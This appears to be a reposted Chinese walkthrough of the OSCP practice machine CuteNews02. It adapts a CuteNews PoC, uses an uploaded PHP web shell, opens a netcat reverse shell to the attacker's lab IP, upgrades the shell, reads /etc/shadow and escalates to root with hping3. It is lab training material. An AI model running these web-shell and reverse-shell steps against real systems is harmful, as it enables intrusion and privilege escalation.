IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> OSCP靶机练习--CuteNews02 -> 正文阅读

[网络协议]OSCP靶机练习--CuteNews02

2. POC脚本修改

POC的脚本通常是通用脚本,很多时候是不满足具体的环境要求的,所以打开这个python脚本,可以看到跟我们的目前的环境路径不一致,多了一个/CuteNews/这个文件路径,将代码包含有这个路径的代码都去掉。然后再整体check一下。这边POC里面的payload我是没有做任何修改的,里面的payload你们也可以根据自己的需求和喜欢来进行修改。

然后重命名为cute2.py

3. 脚本运行

获得上面的用户名密码?gKQN1u2p6i? / gKQN1u2p6i

4. 终端升级,默认进到系统的是一个受限终端,升级终端

在升级终端的过程中我们发现终端不能够升级,而且试验的过程中上面的终端已经死掉了,上面的命令重新执行一次 python3 cute2.py

?看到这边的路径和路径里面的内容,可以看到这个是文件上传的路径,该路径下面还存在上面默认形成的payload文件

代码里面的内容:是命令行模式如下:

?同时在上篇信息收集后面,我们还发现有一个文件上传的

?

?用上面获得的账号登录:

?

?

?

?尝试使用上面的文件上传链接,和之前poc中已经存在的php,如下图:

链接:http://192.168.1.16/uploads/avatar_gKQN1u2p6i_gKQN1u2p6i.php?cmd=id

?从页面上面的反馈信息,可以看出这边的命令行执行可以正常促发,接下来我们来做一个反弹shell,先在kali端开启监听 (kali机器IP地址:192.168.1.18):

?网页端反弹shell如下:

http://192.168.1.16/uploads/avatar_gKQN1u2p6i_gKQN1u2p6i.php?cmd=id%20|nc%20192.168.1.18%204444%20-e%20/bin/sh

?查看服务端。从返回的信息确定反弹成功

?终端升级:

python -c 'import pty; pty.spawn("/bin/sh")'

?可以看到升级成功,然后确定一下目前的sh满足不满足要求

5. 终端提权

使用一些基本的命令

pwd / cat /etc/passwd? cat /etc/shadow? cd /root? sudo ....

?GTFOBins?在这个上面可以找到sudo有关命令的提权方式。

?

在提权前,将终端再次升级成完整终端:

?然后使用上面hping3 提权获得root的profile。再将ip地址获得一下。

这样上面这台靶机就打完了。可能其他人会有不同的打靶的思路也可以在评论区留言。

接下来就是OSCP打靶机的官方英文版报告整理:?OSCP靶机练习--CuteNews03(English Report)

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-24 18:32:39  更:2022-05-24 18:34:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/19 14:51:26-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码